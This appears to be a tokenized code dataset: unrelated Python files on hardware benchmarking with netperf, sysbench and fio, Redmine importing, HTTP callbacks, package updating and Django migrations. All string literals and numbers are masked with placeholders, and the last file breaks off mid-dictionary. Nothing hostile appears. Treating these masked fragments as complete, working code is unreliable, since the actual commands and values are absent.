sub_options , "<STR_LIT>" % ( message . block_size , message . block_size ) ) <EOL> if message . network_connection == HM . UDP : <EOL> netperf_mode = "<STR_LIT>" <EOL> elif message . network_test == HM . LATENCY : <EOL> netperf_mode = "<STR_LIT>" <EOL> if message . network_connection == HM . UDP : <EOL> netperf_mode = "<STR_LIT>" <EOL> sys . stderr . write ( "<STR_LIT>" % ( netperf_mode , message . my_peer_name , ip , port ) ) <EOL> cmd_netperf = subprocess . Popen ( <EOL> '<STR_LIT>' % ( message . running_time , ip , port , netperf_mode , unit , sub_options ) , <EOL> shell = True , stdout = subprocess . PIPE ) <EOL> return_code = cmd_netperf . wait ( ) <EOL> if return_code == <NUM_LIT:0> : <EOL> for line in cmd_netperf . 
stdout : <EOL> stop = Set ( [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> current = Set ( line . split ( ) ) <EOL> if current . intersection ( stop ) : <EOL> continue <EOL> elif ( len ( line . split ( ) ) < <NUM_LIT:4> ) : <EOL> continue <EOL> else : <EOL> if message . network_test == HM . BANDWIDTH : <EOL> message . hw . append ( ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' % ( ip , port ) , str ( line . split ( ) [ <NUM_LIT:4> ] ) ) ) <EOL> elif message . network_test == HM . LATENCY : <EOL> message . hw . append ( ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' % ( ip , port ) , str ( line . split ( ) [ <NUM_LIT:5> ] ) ) ) <EOL> else : <EOL> sys . stderr . write ( "<STR_LIT>" % cmd_netperf . returncode ) <EOL> for line in cmd_netperf . stdout : <EOL> sys . stderr . write ( line ) <EOL> def run_network_bench ( message ) : <EOL> run_netperf ( message ) <EOL> def run_netperf ( message ) : <EOL> threads = { } <EOL> nb = <NUM_LIT:0> <EOL> sys . stderr . write ( '<STR_LIT>' % ( message . network_test , message . block_size , message . running_time ) ) <EOL> for server in message . peer_servers : <EOL> if message . my_peer_name == server [ <NUM_LIT:1> ] : <EOL> continue <EOL> threads [ nb ] = threading . Thread ( target = start_bench_client , args = [ server [ <NUM_LIT:1> ] , get_my_ip_port ( message ) , message ] ) <EOL> threads [ nb ] . start ( ) <EOL> nb += <NUM_LIT:1> <EOL> sys . stderr . write ( '<STR_LIT>' % nb ) <EOL> for i in range ( nb ) : <EOL> threads [ i ] . join ( ) <EOL> def run_sysbench_memory ( message ) : <EOL> if message . mode == HM . FORKED : <EOL> run_sysbench_memory_forked ( message . hw , message . running_time , message . block_size , message . cpu_instances ) <EOL> else : <EOL> run_sysbench_memory_threaded ( message . hw , message . running_time , message . block_size , message . 
cpu_instances ) <EOL> def run_sysbench_memory_threaded ( hw_ , max_time , block_size , cpu_count , processor_num = - <NUM_LIT:1> ) : <EOL> '<STR_LIT>' <EOL> check_mem = check_mem_size ( block_size , cpu_count ) <EOL> taskset = '<STR_LIT>' <EOL> if ( processor_num < <NUM_LIT:0> ) : <EOL> if check_mem is False : <EOL> msg = ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> sys . stderr . write ( msg % block_size ) <EOL> return <EOL> sys . stderr . write ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> % ( block_size , max_time , cpu_count ) ) <EOL> else : <EOL> if check_mem is False : <EOL> msg = ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> sys . stderr . write ( msg % ( block_size , processor_num ) ) <EOL> return <EOL> sys . stderr . write ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> % ( block_size , processor_num , max_time , cpu_count ) ) <EOL> taskset = '<STR_LIT>' % hex ( <NUM_LIT:1> << processor_num ) <EOL> _cmd = '<STR_LIT>' '<STR_LIT>' <EOL> sysbench_cmd = subprocess . Popen ( _cmd % ( taskset , max_time , <EOL> cpu_count , block_size ) , <EOL> shell = True , stdout = subprocess . PIPE ) <EOL> for line in sysbench_cmd . stdout : <EOL> if "<STR_LIT>" in line : <EOL> title , right = line . rstrip ( '<STR_LIT:\n>' ) . replace ( '<STR_LIT:U+0020>' , '<STR_LIT>' ) . split ( '<STR_LIT:(>' ) <EOL> perf , useless = right . split ( '<STR_LIT:.>' ) <EOL> if processor_num == - <NUM_LIT:1> : <EOL> hw_ . append ( ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' <EOL> % block_size , perf ) ) <EOL> else : <EOL> hw_ . append ( ( '<STR_LIT>' , '<STR_LIT>' % processor_num , '<STR_LIT>' <EOL> % block_size , perf ) ) <EOL> def run_sysbench_memory_forked ( hw_ , max_time , block_size , cpu_count ) : <EOL> '<STR_LIT>' <EOL> if check_mem_size ( block_size , cpu_count ) is False : <EOL> cmd = '<STR_LIT>' '<STR_LIT>' <EOL> sys . stderr . write ( cmd % ( block_size , cpu_count ) ) <EOL> return <EOL> sys . stderr . 
write ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> % ( block_size , max_time , cpu_count ) ) <EOL> sysbench_cmd = '<STR_LIT:(>' <EOL> for cpu in range ( cpu_count ) : <EOL> _cmd = '<STR_LIT>' '<STR_LIT>' <EOL> sysbench_cmd += _cmd % ( max_time , block_size ) <EOL> sysbench_cmd . rstrip ( '<STR_LIT:&>' ) <EOL> sysbench_cmd += '<STR_LIT:)>' <EOL> global_perf = <NUM_LIT:0> <EOL> process = subprocess . Popen ( <EOL> sysbench_cmd , shell = True , stdout = subprocess . PIPE ) <EOL> for line in process . stdout : <EOL> if "<STR_LIT>" in line : <EOL> title , right = line . rstrip ( '<STR_LIT:\n>' ) . replace ( '<STR_LIT:U+0020>' , '<STR_LIT>' ) . split ( '<STR_LIT:(>' ) <EOL> perf , useless = right . split ( '<STR_LIT:.>' ) <EOL> global_perf += int ( perf ) <EOL> hw_ . append ( ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' % <EOL> ( block_size ) , str ( global_perf ) ) ) <EOL> def generate_filename_and_macs ( items ) : <EOL> '''<STR_LIT>''' <EOL> hw_items = list ( items ) <EOL> sysvars = { } <EOL> sysvars [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> matcher . match_spec ( ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:name>' , '<STR_LIT>' ) , <EOL> hw_items , sysvars ) <EOL> if '<STR_LIT>' in sysvars : <EOL> sysvars [ '<STR_LIT>' ] = re . sub ( r'<STR_LIT>' , '<STR_LIT>' , sysvars [ '<STR_LIT>' ] ) + '<STR_LIT:->' <EOL> matcher . match_spec ( ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> hw_items , sysvars ) <EOL> if '<STR_LIT>' in sysvars : <EOL> sysvars [ '<STR_LIT>' ] += re . sub ( r'<STR_LIT>' , '<STR_LIT>' , sysvars [ '<STR_LIT>' ] ) + '<STR_LIT:->' <EOL> matcher . match_spec ( ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> hw_items , sysvars ) <EOL> if '<STR_LIT>' in sysvars : <EOL> sysvars [ '<STR_LIT>' ] += re . sub ( r'<STR_LIT>' , '<STR_LIT>' , sysvars [ '<STR_LIT>' ] ) + '<STR_LIT:->' <EOL> if matcher . 
match_multiple ( hw_items , <EOL> ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> sysvars ) : <EOL> sysvars [ '<STR_LIT>' ] += sysvars [ '<STR_LIT>' ] [ <NUM_LIT:0> ] . replace ( '<STR_LIT::>' , '<STR_LIT:->' ) <EOL> else : <EOL> HP . logger . error ( '<STR_LIT>' ) <EOL> return sysvars <EOL> def check_mce_status ( hw_ ) : <EOL> if os . path . isfile ( '<STR_LIT>' ) and os . stat ( '<STR_LIT>' ) . st_size > <NUM_LIT:0> : <EOL> hw_ . append ( ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:True>' ) ) <EOL> else : <EOL> hw_ . append ( ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:False>' ) ) <EOL> def run_fio_job ( message ) : <EOL> mode = message . access <EOL> if message . mode == HM . RANDOM : <EOL> mode = "<STR_LIT>" % mode <EOL> run_fio ( message . hw , message . device . split ( ) , mode , message . block_size , message . running_time - message . rampup_time , message . rampup_time ) <EOL> def run_fio ( hw_ , disks_list , mode , io_size , time , rampup_time ) : <EOL> filelist = [ f for f in os . listdir ( "<STR_LIT:.>" ) if f . endswith ( "<STR_LIT>" ) ] <EOL> for myfile in filelist : <EOL> os . remove ( myfile ) <EOL> fio = "<STR_LIT>" "<STR_LIT>" "<STR_LIT>" % ( rampup_time , time , io_size , mode ) <EOL> global_disk_list = '<STR_LIT>' <EOL> for disk in disks_list : <EOL> if '<STR_LIT>' not in disk : <EOL> disk = '<STR_LIT>' % disk <EOL> os . system ( "<STR_LIT>" % disk ) <EOL> short_disk = disk . replace ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> fio = "<STR_LIT>" % ( fio , short_disk , disk ) <EOL> global_disk_list += '<STR_LIT>' % short_disk <EOL> global_disk_list = global_disk_list . rstrip ( '<STR_LIT:U+002C>' ) <EOL> sys . stderr . write ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' % <EOL> ( global_disk_list , time , mode , io_size ) ) <EOL> fio_cmd = subprocess . Popen ( fio , <EOL> shell = True , stdout = subprocess . PIPE ) <EOL> current_disk = '<STR_LIT>' <EOL> for line in fio_cmd . 
stdout : <EOL> if ( '<STR_LIT>' in line ) and ( '<STR_LIT>' in line ) : <EOL> current_disk = re . search ( '<STR_LIT>' , line ) . group ( <NUM_LIT:1> ) <EOL> continue <EOL> if ( "<STR_LIT>" in line ) or ( "<STR_LIT>" in line ) : <EOL> if ( len ( disks_list ) > <NUM_LIT:1> ) : <EOL> mode_str = "<STR_LIT>" % ( mode , io_size ) <EOL> else : <EOL> mode_str = "<STR_LIT>" % ( mode , io_size ) <EOL> try : <EOL> perf = re . search ( '<STR_LIT>' , line ) . group ( <NUM_LIT:1> ) <EOL> except Exception : <EOL> sys . stderr . write ( '<STR_LIT>' <EOL> '<STR_LIT>' % line ) <EOL> else : <EOL> multiply = <NUM_LIT:1> <EOL> divide = <NUM_LIT:1> <EOL> if "<STR_LIT>" in perf : <EOL> multiply = <NUM_LIT> <EOL> elif "<STR_LIT>" in perf : <EOL> multiply = <NUM_LIT:1> <EOL> elif "<STR_LIT>" in perf : <EOL> divide = <NUM_LIT> <EOL> try : <EOL> iperf = perf . replace ( <EOL> '<STR_LIT>' , '<STR_LIT>' ) . replace ( '<STR_LIT>' , '<STR_LIT>' ) . replace ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> except Exception : <EOL> True <EOL> hw_ . append ( ( '<STR_LIT>' , current_disk , mode_str + '<STR_LIT>' , <EOL> str ( int ( float ( float ( iperf ) * multiply / divide ) ) ) ) ) <EOL> try : <EOL> hw_ . append ( ( '<STR_LIT>' , current_disk , mode_str + '<STR_LIT>' , <EOL> re . search ( '<STR_LIT>' , line ) . group ( <NUM_LIT:1> ) . strip ( '<STR_LIT:U+0020>' ) ) ) <EOL> except Exception : <EOL> sys . stderr . write ( '<STR_LIT>' <EOL> '<STR_LIT>' % line ) </s>
<s> """<STR_LIT>""" <EOL> from werkzeug . routing import Map , Rule <EOL> urlmap = Map ( [ <EOL> Rule ( '<STR_LIT>' , endpoint = '<STR_LIT>' ) , <EOL> Rule ( '<STR_LIT>' , endpoint = '<STR_LIT>' ) , <EOL> Rule ( '<STR_LIT>' , endpoint = '<STR_LIT>' ) , <EOL> Rule ( '<STR_LIT>' , endpoint = '<STR_LIT>' ) , <EOL> Rule ( '<STR_LIT>' , endpoint = '<STR_LIT>' ) , <EOL> Rule ( '<STR_LIT>' , endpoint = '<STR_LIT>' ) , <EOL> Rule ( '<STR_LIT>' , endpoint = '<STR_LIT>' ) , <EOL> Rule ( '<STR_LIT>' , endpoint = '<STR_LIT>' ) , <EOL> Rule ( '<STR_LIT>' , endpoint = '<STR_LIT>' ) , <EOL> Rule ( '<STR_LIT>' , endpoint = '<STR_LIT>' ) , <EOL> Rule ( '<STR_LIT>' , endpoint = '<STR_LIT>' ) , <EOL> Rule ( '<STR_LIT>' , endpoint = '<STR_LIT>' ) , <EOL> Rule ( '<STR_LIT>' , endpoint = '<STR_LIT>' ) , <EOL> Rule ( '<STR_LIT>' , endpoint = '<STR_LIT>' ) , <EOL> Rule ( '<STR_LIT>' , endpoint = '<STR_LIT>' ) , <EOL> Rule ( '<STR_LIT>' , endpoint = '<STR_LIT>' ) , <EOL> ] ) </s>
<s> from redmine import Redmine <EOL> class BaseRedmine ( object ) : <EOL> def __init__ ( self , username = None , password = None , <EOL> apikey = None , id = None , url = None , name = None ) : <EOL> super ( BaseRedmine , self ) . __init__ ( ) <EOL> self . username = username <EOL> self . password = password <EOL> self . apikey = apikey <EOL> self . id = id <EOL> self . url = url <EOL> self . name = name <EOL> self . _create_connector ( ) <EOL> def _create_connector ( self ) : <EOL> if self . apikey : <EOL> self . redmine = Redmine ( self . url , key = self . apikey , <EOL> requests = { '<STR_LIT>' : False } ) <EOL> else : <EOL> self . redmine = Redmine ( self . url , username = self . username , <EOL> password = self . password , <EOL> requests = { '<STR_LIT>' : False } ) <EOL> class BaseIssueImporter ( object ) : <EOL> def __init__ ( self ) : <EOL> super ( BaseIssueImporter , self ) . __init__ ( ) <EOL> def fetch_trackers ( self ) : <EOL> raise NotImplementedError <EOL> def fetch_wiki ( self ) : <EOL> raise NotImplementedError <EOL> def fetch_issue_statuses ( self ) : <EOL> raise NotImplementedError <EOL> def fetch_users ( self ) : <EOL> raise NotImplementedError <EOL> def fetch_versions ( self ) : <EOL> raise NotImplementedError <EOL> def fetch_issues ( self ) : <EOL> raise NotImplementedError </s>
<s> from MockOS import MockOS as delegate_class </s>
<s> import threading <EOL> import time <EOL> import logging <EOL> import httplib2 <EOL> import json <EOL> import re <EOL> import base64 <EOL> class CallbackWorker ( ) : <EOL> def __init__ ( self , callback_url ) : <EOL> self . log = logging . getLogger ( '<STR_LIT>' % ( __name__ , self . __class__ . __name__ ) ) <EOL> self . callback_queue = [ ] <EOL> self . queue_lock = threading . BoundedSemaphore ( ) <EOL> self . queue_not_empty = threading . Event ( ) <EOL> self . httplib = httplib2 . Http ( ) <EOL> url_regex = r"<STR_LIT>" <EOL> sr = re . search ( url_regex , callback_url ) <EOL> if sr : <EOL> self . callback_url = sr . group ( <NUM_LIT:1> ) + sr . group ( <NUM_LIT:6> ) <EOL> auth = base64 . encodestring ( sr . group ( <NUM_LIT:2> ) + '<STR_LIT::>' + sr . group ( <NUM_LIT:4> ) ) <EOL> self . headers = { '<STR_LIT>' : '<STR_LIT:application/json>' , '<STR_LIT>' : '<STR_LIT>' + auth } <EOL> else : <EOL> self . callback_url = callback_url <EOL> self . headers = { '<STR_LIT>' : '<STR_LIT:application/json>' } <EOL> self . shutdown = False <EOL> def start ( self ) : <EOL> self . thread = threading . Thread ( target = self ) <EOL> self . thread . start ( ) <EOL> return self . thread <EOL> def shut_down ( self , blocking = False ) : <EOL> self . shutdown = True <EOL> self . queue_lock . acquire ( ) <EOL> if len ( self . callback_queue ) == <NUM_LIT:0> : <EOL> self . queue_not_empty . set ( ) <EOL> self . queue_lock . release ( ) <EOL> if blocking : <EOL> self . thread . join ( ) <EOL> def status_notifier ( self , notification ) : <EOL> image = notification . sender <EOL> _type = type ( image ) . __name__ <EOL> typemap = { "<STR_LIT>" : "<STR_LIT>" , "<STR_LIT>" : "<STR_LIT>" , "<STR_LIT>" : "<STR_LIT>" } <EOL> if not _type in typemap : <EOL> raise Exception ( "<STR_LIT>" % _type ) <EOL> callback_body = { typemap [ _type ] : { '<STR_LIT>' : _type , <EOL> '<STR_LIT:id>' : image . identifier } } <EOL> for key in image . 
metadata ( ) : <EOL> if key not in ( '<STR_LIT>' , '<STR_LIT:data>' , '<STR_LIT>' , '<STR_LIT>' ) : <EOL> callback_body [ typemap [ _type ] ] [ key ] = getattr ( image , key , None ) <EOL> self . _enqueue ( callback_body ) <EOL> def _enqueue ( self , status_update ) : <EOL> if self . shutdown : <EOL> raise Exception ( "<STR_LIT>" ) <EOL> self . queue_lock . acquire ( ) <EOL> self . callback_queue . append ( status_update ) <EOL> self . queue_not_empty . set ( ) <EOL> self . queue_lock . release ( ) <EOL> def _wait_for_callback ( self ) : <EOL> self . log . debug ( "<STR_LIT>" ) <EOL> self . queue_not_empty . wait ( ) <EOL> self . log . debug ( "<STR_LIT>" ) <EOL> def _get_next_callback ( self ) : <EOL> self . queue_lock . acquire ( ) <EOL> if len ( self . callback_queue ) == <NUM_LIT:0> : <EOL> self . queue_lock . release ( ) <EOL> return None <EOL> next_callback = self . callback_queue . pop ( <NUM_LIT:0> ) <EOL> if len ( self . callback_queue ) == <NUM_LIT:0> : <EOL> self . queue_not_empty . clear ( ) <EOL> self . queue_lock . release ( ) <EOL> return next_callback <EOL> def _do_next_callback ( self ) : <EOL> self . _wait_for_callback ( ) <EOL> next_callback = self . _get_next_callback ( ) <EOL> if next_callback : <EOL> self . log . debug ( "<STR_LIT>" % ( str ( next_callback ) ) ) <EOL> if self . callback_url == "<STR_LIT>" : <EOL> self . log . debug ( "<STR_LIT>" ) <EOL> time . sleep ( <NUM_LIT:5> ) <EOL> else : <EOL> self . log . debug ( "<STR_LIT>" % ( self . callback_url ) ) <EOL> try : <EOL> resp , content = self . httplib . request ( self . callback_url , <EOL> "<STR_LIT>" , body = json . dumps ( next_callback ) , <EOL> headers = self . headers ) <EOL> except Exception , e : <EOL> self . log . debug ( "<STR_LIT>" % ( str ( e ) ) ) <EOL> def __call__ ( self ) : <EOL> while True : <EOL> self . _do_next_callback ( ) <EOL> if self . shutdown and len ( self . callback_queue ) == <NUM_LIT:0> : <EOL> break </s>
<s> """<STR_LIT>""" <EOL> from xmlloader import * <EOL> from xmldumper import * </s>
<s> import os <EOL> from os import path <EOL> import shutil <EOL> import tempfile <EOL> from combine import sha1 , Manifest , Package , File , URI , log <EOL> class Update : <EOL> def __init__ ( self , currentver , manifest = None , manifesturi = None ) : <EOL> """<STR_LIT>""" <EOL> if manifest is None : <EOL> if manifesturi is None : <EOL> raise Exception ( "<STR_LIT>" ) <EOL> with URI ( manifesturi ) as uri : <EOL> manifest = Manifest . from_yaml ( uri . read ( ) ) <EOL> if currentver != manifest [ "<STR_LIT>" ] : <EOL> log . error ( "<STR_LIT>" . format ( <EOL> currentver , manifest [ "<STR_LIT>" ] ) ) <EOL> raise Exception ( "<STR_LIT>" ) <EOL> self . manifest = manifest <EOL> self . package = None <EOL> def apply ( self , installpath , backuppath = None ) : <EOL> """<STR_LIT>""" <EOL> self . installpath = installpath <EOL> manifest = self . manifest <EOL> if "<STR_LIT>" in manifest : <EOL> packageuri = URI ( manifest [ "<STR_LIT>" ] ) <EOL> packagename = path . basename ( packageuri [ "<STR_LIT:path>" ] ) <EOL> packagepath = path . join ( tempfile . gettempdir ( ) , packagename ) <EOL> packageformat = None <EOL> if "<STR_LIT>" in manifest : <EOL> packageformat = manifest [ "<STR_LIT>" ] <EOL> log . info ( "<STR_LIT>" . format ( packageuri . uri ) ) <EOL> packageuri . fetch ( packagepath ) <EOL> packageuri . close ( ) <EOL> if "<STR_LIT>" in manifest : <EOL> packagesha1 = sha1 ( packagepath ) <EOL> if not packagesha1 == manifest [ "<STR_LIT>" ] : <EOL> raise Exception ( "<STR_LIT>" ) <EOL> self . package = Package ( packagepath , packageformat ) <EOL> if backuppath is None : <EOL> self . backuppath = tempfile . mkdtemp ( prefix = "<STR_LIT>" ) <EOL> else : <EOL> self . backuppath = backuppath <EOL> if not path . isdir ( self . backuppath ) : <EOL> log . debug ( "<STR_LIT>" . format ( self . backuppath ) ) <EOL> os . mkdir ( self . backuppath ) <EOL> try : <EOL> for info in manifest . actions : <EOL> self . 
_action ( info ) <EOL> except Exception as err : <EOL> log . exception ( "<STR_LIT>" ) <EOL> for root , dirs , files in os . walk ( self . backuppath ) : <EOL> relpath = path . relpath ( root , self . backuppath ) <EOL> if relpath == "<STR_LIT:.>" : <EOL> relpath = "<STR_LIT>" <EOL> for filename in files : <EOL> filepath = path . join ( relpath , filename ) <EOL> log . info ( "<STR_LIT>" % ( filepath ) ) <EOL> self . _restore ( filepath ) <EOL> log . info ( "<STR_LIT>" ) <EOL> raise <EOL> finally : <EOL> self . cleanup = False <EOL> shutil . rmtree ( self . backuppath , onerror = self . _onerror ) <EOL> self . package . close ( ) <EOL> os . remove ( packagepath ) <EOL> if self . cleanup : <EOL> return self . backuppath <EOL> def _onerror ( self , func , filepath , error ) : <EOL> self . cleanup = True <EOL> def _backup ( self , filename , move = True ) : <EOL> ipath = path . normpath ( path . join ( self . installpath , filename ) ) <EOL> bpath = path . normpath ( path . join ( self . backuppath , filename ) ) <EOL> if not path . isfile ( ipath ) : <EOL> return <EOL> bdir = path . dirname ( bpath ) <EOL> if not path . isdir ( bdir ) : <EOL> os . makedirs ( bdir ) <EOL> try : <EOL> if move : <EOL> log . debug ( "<STR_LIT>" . format ( filename ) ) <EOL> shutil . move ( ipath , bpath ) <EOL> else : <EOL> log . debug ( "<STR_LIT>" . format ( filename ) ) <EOL> shutil . copy ( ipath , bpath ) <EOL> except : <EOL> log . debug ( "<STR_LIT>" . format ( filename ) ) <EOL> def _restore ( self , filename ) : <EOL> ipath = path . normpath ( path . join ( self . installpath , filename ) ) <EOL> bpath = path . normpath ( path . join ( self . backuppath , filename ) ) <EOL> idir = path . dirname ( ipath ) <EOL> if not path . isdir ( idir ) : <EOL> os . makedirs ( idir ) <EOL> try : <EOL> if path . isfile ( ipath ) : <EOL> log . debug ( "<STR_LIT>" . format ( filename ) ) <EOL> os . remove ( ipath ) <EOL> log . debug ( "<STR_LIT>" . format ( filename ) ) <EOL> shutil . 
move ( bpath , ipath ) <EOL> except : <EOL> log . debug ( "<STR_LIT>" . format ( filename ) ) <EOL> def _action ( self , info ) : <EOL> action = info [ "<STR_LIT:action>" ] <EOL> filename = info [ "<STR_LIT:filename>" ] <EOL> fullpath = path . join ( self . installpath , filename ) <EOL> if action == "<STR_LIT>" : <EOL> log . info ( "<STR_LIT>" . format ( filename ) ) <EOL> hash = info [ "<STR_LIT>" ] <EOL> if not sha1 ( fullpath ) == hash : <EOL> if "<STR_LIT>" in info : <EOL> fullformat = None <EOL> if "<STR_LIT>" in info : <EOL> fullformat = info [ "<STR_LIT>" ] <EOL> self . _backup ( filename ) <EOL> log . info ( "<STR_LIT>" . format ( info [ "<STR_LIT>" ] ) ) <EOL> with URI ( info [ "<STR_LIT>" ] , package = self . package , format = fullformat , <EOL> target = fullpath ) : <EOL> if not sha1 ( fullpath ) == hash : <EOL> raise Exception ( "<STR_LIT>" ) <EOL> else : <EOL> raise Exception ( "<STR_LIT>" ) <EOL> elif action == "<STR_LIT>" : <EOL> log . info ( "<STR_LIT>" . format ( filename ) ) <EOL> hash = info [ "<STR_LIT>" ] <EOL> if "<STR_LIT>" in info : <EOL> fullformat = None <EOL> if "<STR_LIT>" in info : <EOL> fullformat = info [ "<STR_LIT>" ] <EOL> log . info ( "<STR_LIT>" . format ( info [ "<STR_LIT>" ] ) ) <EOL> with URI ( info [ "<STR_LIT>" ] , package = self . package , format = fullformat , <EOL> target = fullpath ) : <EOL> if not sha1 ( fullpath ) == hash : <EOL> raise Exception ( "<STR_LIT>" ) <EOL> else : <EOL> raise Exception ( "<STR_LIT>" ) <EOL> elif action == "<STR_LIT:replace>" : <EOL> log . info ( "<STR_LIT>" . format ( filename ) ) <EOL> hash = info [ "<STR_LIT>" ] <EOL> if "<STR_LIT>" in info : <EOL> fullformat = None <EOL> if "<STR_LIT>" in info : <EOL> fullformat = info [ "<STR_LIT>" ] <EOL> self . _backup ( filename ) <EOL> log . info ( "<STR_LIT>" . format ( info [ "<STR_LIT>" ] ) ) <EOL> with URI ( info [ "<STR_LIT>" ] , package = self . 
package , format = fullformat , <EOL> target = fullpath ) : <EOL> if not sha1 ( fullpath ) == hash : <EOL> raise Exception ( "<STR_LIT>" ) <EOL> else : <EOL> raise Exception ( "<STR_LIT>" ) <EOL> elif action == "<STR_LIT>" : <EOL> log . info ( "<STR_LIT>" . format ( filename ) ) <EOL> self . _backup ( filename ) <EOL> elif action == "<STR_LIT>" : <EOL> log . warning ( "<STR_LIT>" ) <EOL> raise Exception ( "<STR_LIT>" ) <EOL> else : <EOL> raise Exception ( "<STR_LIT>" % ( action ) ) </s>
<s> from os import path , environ <EOL> from os . path import abspath , dirname , join <EOL> import sys <EOL> example_dir = dirname ( abspath ( __file__ ) ) <EOL> emailauth_dir = dirname ( example_dir ) <EOL> sys . path . insert ( <NUM_LIT:0> , example_dir ) <EOL> sys . path . insert ( <NUM_LIT:0> , emailauth_dir ) <EOL> from django . core . management import execute_manager <EOL> try : <EOL> import settings <EOL> except ImportError : <EOL> import sys <EOL> sys . stderr . write ( "<STR_LIT>" % __file__ ) <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> execute_manager ( settings ) </s>
<s> """<STR_LIT>""" </s>
<s> import datetime <EOL> from south . db import db <EOL> from south . v2 import SchemaMigration <EOL> from django . db import models <EOL> class Migration ( SchemaMigration ) : <EOL> def forwards ( self , orm ) : <EOL> db . create_unique ( '<STR_LIT>' , [ '<STR_LIT:name>' ] ) <EOL> def backwards ( self , orm ) : <EOL> db . delete_unique ( '<STR_LIT>' , [ '<STR_LIT:name>' ] ) <EOL> models = { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT:code>' : ( '<STR_LIT>' , [ ] , { } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : "<STR_LIT>" , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : "<STR_LIT>" , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { 
'<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT:value>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT:code>' : ( '<STR_LIT>' , [ ] , { } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : "<STR_LIT>" , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : 